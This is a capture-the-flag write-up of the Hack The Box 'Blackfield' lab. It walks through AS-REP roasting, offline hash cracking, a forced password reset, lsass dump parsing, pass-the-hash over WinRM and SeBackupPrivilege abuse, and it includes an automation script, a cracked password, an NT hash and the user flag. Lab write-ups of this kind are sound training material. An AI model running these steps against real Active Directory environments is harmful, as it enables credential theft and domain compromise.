Details
URL Hack The Box :: Blackfield
Difficulty Hard
User Solves 153
Release Date 22 Aug, 2024

Recon

Rustscan & Nmap

Ran a quick Rustscan and fed the output into Nmap for a deeper scan.

└─$ python3 ./rs2nm.py 10.129.229.17
Just gonnae run a quick wee Rustscan test...
You selected: 10.129.229.17
Estimated Time Remaining: 1h 35m
Just kidding — only a few seconds!

OOoh, there are a few ports open:
(53, 88, 135, 389, 445, 5985)

Starting Nmap...

Nmap Results:

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Active Directory LDAP
445/tcp  open  microsoft-ds  SMB
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Host: DC01.BLACKFIELD.local (Windows Server 2019). Port 5985 (the "Microsoft HTTPAPI" banner) is WinRM, which is the remote-management channel used later with Evil-WinRM.

Note: Added both the domain name and the DC hostname to /etc/hosts, since Kerberos and rpcclient are happier resolving dc01.blackfield.local by name.

echo "10.129.229.17 blackfield.local dc01.blackfield.local" | sudo tee -a /etc/hosts

SMB Enumeration

Using CrackMapExec with a null session to list shares:

└─$ crackmapexec smb blackfield.local -u '' -p '' --shares
  • Found shares: forensic, profiles$, IPC$
  • Only profiles$ is readable (READ) without credentials.

Exploring profiles$:

└─$ smbclient -N //blackfield.local/profiles$

The listing is several hundred folders, one per user profile. The folder names are usernames, so I dumped them into a users.txt wordlist for Kerberos enumeration.
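As an added example (not part of the original writeup), the script below turns an smbclient directory listing into users.txt and then runs impacket's GetNPUsers once over the whole list instead of one process per user. The listing embedded in it is constructed to look like smbclient's ls output; the names in it, the DC IP and the wordlist path are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example, not code from the original writeup.
# Build a username wordlist from `smbclient ... -c ls` output and AS-REP roast it.
set -eu

# Constructed sample of what `smbclient -N //blackfield.local/profiles$ -c ls`
# prints. Names are illustrative, not the real profiles$ listing.
SAMPLE_LISTING='  .                                   D        0  Wed Jun  3 13:47:12 2020
  ..                                  D        0  Wed Jun  3 13:47:12 2020
  AAlleni                             D        0  Wed Jun  3 13:47:11 2020
  ABarteski                           D        0  Wed Jun  3 13:47:11 2020
  support                             D        0  Wed Jun  3 13:47:11 2020
  notes.txt                           A       12  Wed Jun  3 13:47:11 2020

                7846911 blocks of size 4096. 4023286 blocks available'

# Keep only directory entries (attribute column "D") and drop "." and "..".
# Each remaining name is a profile folder, i.e. a username. Reads stdin.
extract_users() {
    awk '$2 == "D" && $1 != "." && $1 != ".." { print $1 }'
}

# Write the wordlist to the given path and return the number of users.
build_wordlist() {
    extract_users > "$1"
    wc -l < "$1" | tr -d ' '
}

# One GetNPUsers run for the whole list: -usersfile replaces the per-user loop,
# -format hashcat emits lines ready for `hashcat -m 18200`. Only accounts with
# "Do not require Kerberos preauthentication" set come back with a hash.
asrep_roast() {
    dc_ip="$1"; users="$2"; out="$3"
    python3 GetNPUsers.py "BLACKFIELD.local/" -usersfile "$users" -no-pass \
        -dc-ip "$dc_ip" -format hashcat -outputfile "$out"
}

# Network steps only run when explicitly requested, e.g.:
#   smbclient -N //blackfield.local/profiles$ -c ls | bash roast.sh --roast 10.129.229.17
if [ "${1:-}" = "--roast" ]; then
    build_wordlist users.txt
    asrep_roast "$2" users.txt asrep.hashes
    hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
fi
```

The awk filter keys on the attribute column rather than on indentation, so files dropped into the share root (like the constructed notes.txt) and the trailing "blocks available" summary line never end up in the wordlist.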


Kerberos Pre-Auth Enumeration

Checked whether any listed user has Kerberos pre-authentication disabled. For such an account the KDC hands out an AS-REP without proof of the password, and the encrypted part of that reply can be cracked offline:

for i in $(cat users.txt); do python3 GetNPUsers.py -dc-ip 10.129.229.17 BLACKFIELD/$i -no-pass; done

This loop spawns one process per user; GetNPUsers also accepts -usersfile to do the whole list in a single run, which is quieter and much faster.

Result:

  • support has pre-auth disabled and returned an AS-REP hash:
$krb5asrep$23$support@BLACKFIELD:...

Cracked offline with hashcat (mode 18200, Kerberos 5 etype 23 AS-REP) against rockyou.txt:

#00^BlackKnight

Exploitation

Initial Access: Support User

BloodHound (collected with the support credentials) shows a ForceChangePassword edge from support to audit2020: support can set a new password for audit2020 without knowing the current one.

Referenced: Reset AD user password with Linux – mubix

Reset the password over SAMR with rpcclient. setuserinfo2 with information level 23 sets a new password outright; the old one is gone, so this is a destructive change worth noting in the report:

rpcclient -U blackfield.local/support -I 10.129.229.17 dc01.blackfield.local
Password for [BLACKFIELD.LOCAL\support]:

rpcclient $> setuserinfo2 audit2020 23 'ILov3Ch3323!'

Authenticated as audit2020:

└─$ crackmapexec smb blackfield.local -u audit2020 -p 'ILov3Ch3323!'

Further SMB Access

Accessed the forensic share:

└─$ smbclient -U audit2020 //blackfield.local/forensic

Found:

  • tools/
  • memory_analysis/
  • commands_output/

From commands_output/domain_admins.txt, the Domain Admins group contains:

  • Administrator
  • Ipwn3dYourCompany

Memory Analysis

Downloaded the zips from memory_analysis/ and started with lsass.zip, which holds a minidump of lsass.exe. Parsed it offline with pypykatz (minidump mode).

Within the lsass memory dump:

  • An Administrator NT hash, but it no longer authenticates against the DC, so the dump predates a password change.
  • Valid credentials for svc_backup:
Username: svc_backup
NT Hash: 9658d1d1dcd9250115e2205d9f48400d

User Flag

Used Evil-WinRM with pass-the-hash over WinRM (-H takes the NT hash, no cleartext password needed):

└─$ evil-winrm -i 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Retrieved user.txt:

3920bb317a0bef51027e2852be64b543

Privilege Escalation

Initial Enumeration

Checked privileges:

whoami /priv

Noticed:

  • SeBackupPrivilege
  • SeRestorePrivilege

whoami /groups confirms membership of Backup Operators, which is where both privileges come from.

According to Microsoft Docs, SeBackupPrivilege lets the holder bypass file, directory and registry permissions for the purpose of backing up the system, i.e. read access to every file regardless of its ACL.

Caveat: the bypass only applies to operations opened with backup semantics. A plain copy or Get-Content still gets Access Denied; robocopy /b, reg save, or a tool that calls the backup APIs is needed, and the target file also has to be unlocked (a shadow copy for files the DC holds open).


Preparing for Privilege Abuse

Launched a listener with Villain:

villain -p 6501 -n 4443 -x 8080 -f 8888

Generated a PowerShell reverse shell payload and executed it on the target.

The resulting shell runs as svc_backup, not SYSTEM. What the backup privilege buys is the ability to read files that only SYSTEM can normally touch, which on a domain controller is the route to every account's hash.


Summary

Stage: Details
Initial Foothold: Cracked support's AS-REP hash (pre-auth disabled) and used its ForceChangePassword right to reset audit2020's password
Further Access: The forensic share, readable as audit2020, held memory dumps
User Access: Retrieved svc_backup's NT hash from lsass.zip and passed the hash over WinRM
Privilege Escalation: Backup Operators membership (SeBackupPrivilege) from the svc_backup shell obtained via the Villain payload

Flags

  • User: 3920bb317a0bef51027e2852be64b543
  • Root: not recorded in this writeup (obtained after abusing SeBackupPrivilege from the svc_backup shell)